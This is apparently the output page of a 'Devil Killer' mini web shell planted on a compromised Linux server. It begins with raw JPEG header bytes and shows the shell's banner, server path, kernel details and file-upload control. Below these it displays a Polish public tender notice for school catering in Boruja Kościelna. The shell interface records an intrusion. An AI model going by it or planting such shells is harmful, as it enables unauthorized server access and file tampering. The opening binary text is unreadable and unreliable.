JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231127/0051495801-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa cateringu – przygotowanie i dowóz posiłków do <br/>Szkoły Podstawowej im. Marii Konopnickiej w Borui Kościelnej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SZKOŁA PODSTAWOWA IM.MARII KONOPNICKIEJ W BORUI KOŚCIELNEJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001225770</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Szkolna 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Boruja Kościelna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">614411377</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">614411377</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariatspbk@op.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://spbk.edupage.org/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa cateringu – przygotowanie i dowóz posiłków do <br/>Szkoły Podstawowej im. Marii Konopnickiej w Borui Kościelnej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d9021529-8d01-11ee-9fb5-3edbb70f45bd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00514958</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00114805/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługa cateringu - przygotowanie i dostarczenie posiłków do Szkoły Podstawowej im. Marii Konopnickiej w Borui Kościelnej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/850525 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/850525</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe informacje w SWZ i w instrukcji https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1 z późn. zm.), dalej „RODO” oraz art. 19 ust. 1 ustawy z dnia 11 września 2019 r –<br/>Prawo zamówień publicznych (Dz.U.2021.1129 j.t.), dalej „PZP” , Zamawiający informuje, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Szkoła Podstawowa w Borui Kościelnej .<br/>2. Kontakt do inspektora danych osobowych: e –mail: just_jan@wp.pl<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. B i c RODO w celu<br/>związanym z postępowanie o udzielenie zamówienia publicznego na Usługa cateringu –<br/>przygotowanie i dowóz posiłków do Szkoły Podstawowej w Borui Kościelnej nr postępowania<br/>SPBK.271.1.2021 prowadzonym w trybie podstawowym bez przeprowadzenia negocjacji art. 275 pkt. 1<br/>w związku z art. 359 pkt.2 ustawy z dnia 11 września 2019 r. ustawy Prawo zamówień publicznych<br/>(Dz. U. 2021.1129 tj.)<br/>4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 Pzp.<br/>5. Pani/Pana dane osobowe będą przechowywane przez okres, który wyznaczony zostanie przede<br/>wszystkim na podstawie rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej,<br/>jednolitych rzeczowych wykazów akt oraz instrukcji w prawie działania archiwów zakładowych, chyba<br/>ze przepisy szczególne stanowią inaczej.<br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Panią/Pana dotyczących<br/>jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego, konsekwencje niepodania określonych danych<br/>wynikają z ustawy Pzp</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">7. W odniesieniu do Pani/Pana danych osobowych, decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO.<br/>8. Posiada Pani/Pan: - na podstawie art 15 RODO prawo dostępu do danych osobowych Pani/Pana<br/>dotyczących; - w przypadku korzystania przez osobę, której dane są przetwarzane przez<br/>Zamawiającego, z uprawnienia, o których mowa w art. 15 ust.1-3 RODO, Zamawiający działający na<br/>podstawie art. 75 ustawy Pzp może żądać od osoby, występującej z żądaniem wskazania<br/>dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy lub daty<br/>zakończonego postępowania o udzielenie zamówienia; - na podstawie art. 16 RODO prawo do<br/>sprostowania Pani/Pana danych osobowych z zastrzeżeniem przepisów art. 19 ust. 2 ustawy Pzp oraz<br/>art. 76 ustawy Pzp; - na podstawie art 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków , o których mowa w art. 18 ust. 2<br/>RODO, przepisu art. 19 ust. 3 ustawy Pzp oraz art. 74 ust. 3 ustawy Pzp; - prawo do wniesienia skargi<br/>do Prezesa Urzędu Ochrony Danych Osobowych (ul. Stawki 2 Warszawa), gdy uznają Pani/Pana, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SPBK.271.1.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usług polegających na przygotowaniu i dostarczeniu – na potrzeby stołówki szkolnej i przedszkola w Borui Kościelnej – gorącego posiłku: śniadania, obiadu, napoju, podwieczorku. Zamawiający szacuje, że w trakcie realizacji zamówienia należy dostarczyć następują ilości posiłków:<br/><br/>a)	Zadanie nr 1 -Oddziały Przedszkolne przy Szkole Podstawowej w Borui Kościelnej (posiłki przedszkolne):<br/><br/>- śniadań 37000 (tj. dni 250 x 148 posiłków)<br/>- obiadów 37000 (tj. dni 250 x 148 posiłków)<br/>- napojów ciepłych do śniada 37000 (tj. dni 250 x 148 napojów)<br/>- napojów do obiadów 37000 (tj. dni 250 x 148 napojów)<br/>- podwieczorków 37000 (tj. dni 250 x 148 posiłków)<br/><br/>b)	Zadanie nr 2 - Szkoła Podstawowa w Borui Kościelnej (obiady szkolne):<br/> - obiadów 14705 (tj. dni 173 x 85 posiłków)<br/> - napojów 14705 (tj. dni 173 x 85 napojów) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55520000-1 - Usługi dostarczania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55321000-6 - Usługi przygotowywania posiłków</p> <p class="mb-0">55521200-0 - Usługi dowożenia posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">365 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">określono szczegółowo w rozdziale XXII SW</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zdolności do występowania w obrocie gospodarczym; <br/>Zamawiający nie stawia wymagań w zakresie tego warunku. <br/>2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej; <br/>O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy posiadają decyzję właściwego miejscowo organu Państwowej Inspekcji Sanitarnej potwierdzającą, że Wykonawca spełnia wymagania higieniczne i zdrowotne konieczne do zapewnienia bezpieczeństwa żywności i żywienia w zakresie obiektu kuchni oraz samochodu transportowego, którym będzie wykonywana usługa. Warunek zostanie uznany przez Zamawiającego za spełniony, jeżeli Wykonawcy składający ofertę wspólną będą spełniać go łącznie. <br/>3. Sytuacji ekonomicznej lub finansowej; <br/>Zamawiający nie stawia wymagań w zakresie tego warunku. <br/>4. Zdolności technicznej lub zawodowej; <br/>Zamawiający uzna, że Wykonawca spełnia wyżej wymieniony warunek, jeżeli Wykonawca posiada wymagane zdolności techniczne i zawodowe zapewniające należyte wykonanie zamówienia, jeżeli Wykonawca wykaże, że: <br/>a) dysponuje lub będzie dysponować na czas realizacji zamówienia minimum jednym samochodem osobowo-dostawczym lub innym pozwalającym na dowóz przygotowanych posiłków do miejsca wskazanego przez Zamawiającego, zgodnie z wymogami sanitarno-higienicznym; <br/>b) wykonał w okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie zrealizował co najmniej jedno zamówienie o wartości nie niżej niż 300 000, 00 zł brutto polegającej na przygotowaniu i dostawie wyżywienia dla dzieci/młodzieży uczęszczających do przedszkoli/szkół. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający dopuszcza łączne spełnienie warunków przez Wykonawców. Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych i zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej<br/>(CEIDG) wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. W<br/>przypadku oferty wspólnej ww. odpis składa każdy z Wykonawców składających ofertę wspólną. Ww.<br/>dokument należy złożyć w oryginale lub kopii potwierdzonej za zgodność z oryginałem. Zamawiający<br/>nie wzywa do złożenia podmiotowych środków dowodowych jeżeli może je uzyskać za pomocą<br/>bezpłatnych i ogólnodostępnych baz danych o ile Wykonawca wskazał w oświadczeniu o którym mowa<br/>w art. 125 ust. 1 Ustawy Pzp dane umożliwiające dostęp do tych środków.<br/>2. Oświadczenie Wykonawcy w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp o braku przynależności do<br/>grupy kapitałowej – w rozumieniu Ustawy z dnia 16 lutego 2007 o ochronie konkurencji i konsumentów,<br/>z innym Wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej<br/>grupy kapitałowej wraz z dokumentami informacyjnymi potwierdzającymi przygotowanie oferty<br/>niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej zgodnie ze wzorem –<br/>Załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.Aktualna decyzja/decyzje właściwego miejscowo organu Państwowej Inspekcji Sanitarnej potwierdzającą, że Wykonawca spełnia wymagania higieniczne i zdrowotne konieczne do zapewnienia bezpieczeństwa żywności i żywienia w zakresie obiektu kuchni oraz samochodu transportowego, którym będzie wykonywana usługa. Warunek zostanie uznany przez Zamawiającego za spełniony, jeżeli Wykonawcy składający ofertę wspólną będą spełniać go łącznie. <br/><br/>2 Wykaz usług, które wykonał Wykonawca w okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie zrealizował co najmniej jedno zamówienie o wartości nie mniejszej niż 300 000, 00 zł brutto polegającej na przygotowaniu i dostawie wyżywienia dla dzieci/młodzieży uczęszczających do przedszkoli/szkół z załączeniem dowodów określających, że usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. <br/><br/>3. Wykaz narzędzi –wyposażenie zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacja o podstawie dysponowania zasobami - minimum jeden samochód osobowo-dostawczy lub inny pozwalający na dowóz przygotowanych posiłków do miejsca wskazanego przez Zamawiającego, zgodnie z wymogami sanitarno-higienicznym</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedłożenia przedmiotowych środków dowodowych <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np. konsorcjum, spółka cywilna)<br/>zobowiązani są do złożenia wraz z ofertą pełnomocnictwa do ich reprezentowania w<br/>postępowaniu o udzielenie zamówienia publicznego. Powyższe nie dotyczy sytuacji, w której<br/>upoważnienie/pełnomocnictwo do występowania w imieniu Wykonawców wspólnie ubiegających<br/>się o udzie-lenie zamówienia wynika z dołączonej do oferty umowy regulującej współpracę<br/>Wykonawców bądź wszyscy wspólnicy podpiszą ofertę.<br/>Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców<br/>występujących wspólnie (przez każdego z Wykonawców lub pełnomocnika).W przypadku<br/>wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o którym mowa w art.<br/>125 ust. 1 ustawy Pzp składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. W<br/>przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie<br/>może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp, oraz w przypadkach, o<br/>których mowa w SWZ.Zgodnie z art. 117 ustawy Pzp warunek dotyczący uprawnień do<br/>prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112<br/>ust. 2 pkt. 2 spełniony jest jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których<br/>realizacji te uprawnienia są wymagane, natomiast w odniesieniu do warunków dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy wspólnie ubiegających<br/>się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy<br/>wykonują roboty budowlane, usługi do realizacji których zdolności są wyma-gane. W<br/>przypadkach, o których mowa w niniejszym punkcie należy załączyć do oferty oświadczenie, z<br/>którego wynika, które roboty budowlane, dostawy lub usługi wykonują poszczególni Wykonawcy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Określono szczegółowo w załączniku nr 5 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/850525</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-06 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Wykonawcy, a także innemu podmiotowi, jeżeli ma lub miał interes prawny w uzyskaniu<br/>przedmiotowego zamówienia oraz poniósł szkodę wyniku naruszenia przez Zamawiającego<br/>przepisów ustawy Pzp , przysługują środki ochrony prawnej określone w dziale IX ustawy Pzp, w<br/>szczególności: 1.1. Odwołanie do Prezesa krajowej Izby odwoławczej zwanej dalej Izbą wnosi<br/>się w terminie:<br/>a) 5 dni od dnia przekazania informacji o czynności Zamawiającego stanowiącej podstawę jego<br/>wniesienia, jeżeli informacja została przekazana przy użyciu środków komunikacji elektronicznej,<br/>b) 10 dni od dnia przekazania informacji o czynnościach Zamawiającego stanowiącej podstawę<br/>jego wniesienia, jeżeli informacja 